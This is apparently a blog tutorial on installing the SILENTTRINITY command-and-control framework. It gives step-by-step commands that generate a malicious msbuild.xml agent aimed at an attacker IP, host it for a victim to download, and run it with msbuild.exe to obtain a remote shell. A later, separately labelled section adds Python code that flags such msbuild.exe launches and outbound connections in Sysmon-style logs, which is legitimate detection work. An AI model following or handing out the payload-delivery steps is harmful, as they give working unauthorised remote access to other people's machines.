Below I'll go through a quick example of installing it and running the most basic agent. I will update this as I mess with ST more. But for now, let's just go over the basics. Let's begin.
Install
The installation of SILENTTRINITY (or ST) is fairly straightforward and easy. Here are the steps I took in order to get it up and running on my Kali host.
Below is a link to ST Github:
There's also the same instructions listed on the ST Wiki:
We first need to make sure that Python 3.7.0 is installed. Here's a link to the Python 3 documentation:
Once we have Python 3.7.0 installed, it's time to install Mono.
When installing Mono, I followed the Debian 9 instructions. I also had to install xsp4 and gtk-sharp2 manually:
apt-get install mono-xsp4
apt-get install gtk-sharp2
make clean
Once complete, verify that Mono works by following the Mono Basics guide:
https://www.mono-project.com/docs/getting-started/mono-basics/
Once Mono is installed, install IronPython. Download the appropriate .deb file and install:
https://github.com/IronLanguages/ironpython2/releases
dpkg -i <debFile>
After that, it's time to download SILENTTRINITY:
cd /opt/
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
Navigate to the SILENTTRINITY/server directory and install the requirements:
pip3 install -r requirements.txt
There may be times where some of the requirements don't install. Just install them manually. For example, hypercorn didn't install correctly for me, so I installed it:
git clone https://github.com/pgjones/hypercorn.git
cd hypercorn
python3.7 setup.py install
Once all the requirements are complete, you can begin by running ST.
Running SILENTTRINITY
In its most basic form, we can create a msbuild.xml file that we will use to create our agent.
We first navigate to our ST server directory:
cd /opt/SILENTTRINITY/Server
We then generate our malicious XML file:
python3.7 stvenom.py msbuild http 8090 -ip <attackerIP>
We then run ST and reference our build file that will open up a listener on port 8090:
python3.7 st.py -r msbuild.res
Next, open a new terminal and go to the same directory where msbuild.xml is. Host the file using something like Python's SimpleHTTPServer:
python -m SimpleHTTPServer 8080
With your malicious file hosted and ST ready for the exploit, we then go to the victim machine and download the msbuild.xml file. Simply open a browser, navigate to the attacker IP on port 8080, and download msbuild.xml.
Once the XML file is downloaded, we can run the file:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
At this point, look in your attacker machine's ST instance and you should now have a shell!
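From the defending side, the last step leaves a recognisable trace: msbuild.exe started from an interactive shell against a project file in a user-writable location, followed by an outbound connection from the same process. The following is an added example, not part of the original post or of SILENTTRINITY; it triages constructed Sysmon-style events (Event ID 1 and 3), and the function names, parent list and path hints are assumptions for illustration.

```python
import ntpath

MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe"

# Constructed sample events using Sysmon field names (ID 1 = process
# creation, ID 3 = network connection). All values are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": MSBUILD,
     "CommandLine": MSBUILD + " msbuild.xml",
     "CurrentDirectory": r"C:\Users\alice\Downloads",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3, "ProcessId": 4120, "Image": MSBUILD,
     "DestinationIp": "192.0.2.10", "DestinationPort": 8090},
    {"EventID": 1, "ProcessId": 5200, "Image": MSBUILD,
     "CommandLine": MSBUILD + r" C:\src\app\app.csproj /t:Build",
     "CurrentDirectory": r"C:\src\app",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe"},
]

# Assumed heuristics: tune both lists to the environment being monitored.
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe"}
USER_PATH_HINTS = ("\\users\\", "\\temp\\", "\\programdata\\")


def exe_name(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename(path).lower()


def triage_msbuild(events):
    """Return {pid: [reasons]} for msbuild.exe processes worth reviewing."""
    findings = {}
    for ev in events:
        if exe_name(ev.get("Image", "")) != "msbuild.exe":
            continue
        reasons = findings.setdefault(ev["ProcessId"], [])
        if ev["EventID"] == 1:
            parent = exe_name(ev["ParentImage"])
            if parent in INTERACTIVE_PARENTS:
                reasons.append("interactive parent: " + parent)
            where = (ev["CommandLine"] + " " + ev["CurrentDirectory"]).lower()
            if any(hint in where for hint in USER_PATH_HINTS):
                reasons.append("project file in user-writable path")
        elif ev["EventID"] == 3:
            reasons.append("outbound connection to %s:%s"
                           % (ev["DestinationIp"], ev["DestinationPort"]))
    return {pid: r for pid, r in findings.items() if r}
```

Calling `triage_msbuild(SAMPLE_EVENTS)` flags only process 4120; the build started by devenv.exe from a source tree produces no findings. Legitimate builds can also make network connections, so the reasons are triage signals to correlate, not verdicts.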
Hope this has been helpful.
Until next time.